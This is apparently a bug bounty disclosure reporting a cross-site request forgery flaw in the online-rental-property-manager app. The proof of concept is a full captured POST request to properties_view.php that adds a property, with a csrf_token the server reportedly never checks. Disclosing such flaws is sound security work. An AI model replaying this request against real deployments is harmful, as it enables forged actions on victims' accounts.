Cross-Site Request Forgery (CSRF) in bigprof-software/online-rental-property-manager
Valid
Reported on
Aug 4th 2021
✍️ Description
CSRF bug to add property
🕵️♂️ Proof of Concept
Bellow request is vulnerable to csrf attack .
Although there is csrf token in request but it does not checked in server-side . Any attacker provided csrf token is accepted here.
POST /online-rental/app/properties_view.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------38437840593695382254572995149
Content-Length: 2917
Origin: http://localhost
Connection: close
Referer: http://localhost/online-rental/app/properties_view.php?filterer_owner=1&addNew_x=1&Embedded=1
Cookie:
Upgrade-Insecure-Requests: 1
Account: test2
-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="Embedded"
1
-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="csrf_token"
41c0d66e879e60346c9223ebedcd003a
-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="filterer_owner"
1
-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="current_view"
DV
-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="SortField"
-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="SelectedID"
-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="SelectedField"
-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="SortDirection"
-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="FirstRecord"
1
-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="NoDV"
-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="PrintDV"
-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="DisplayRecords"
all
-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="property_name"
property1_by_user
-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="photo"; filename=""
Content-Type: application/octet-stream
-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="type"
Residential
-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="number_of_units"
-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="owner"
1
-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="country"
-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="street"
-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="City"
-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="State"
-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="ZIP"
-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="insert_x"
1
-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="SearchString"
-----------------------------38437840593695382254572995149--
💥 Impact
csrf bug
We have contacted a member of the
bigprof-software/online-rental-property-manager
team and are waiting to hear back
2 years ago
to join this conversation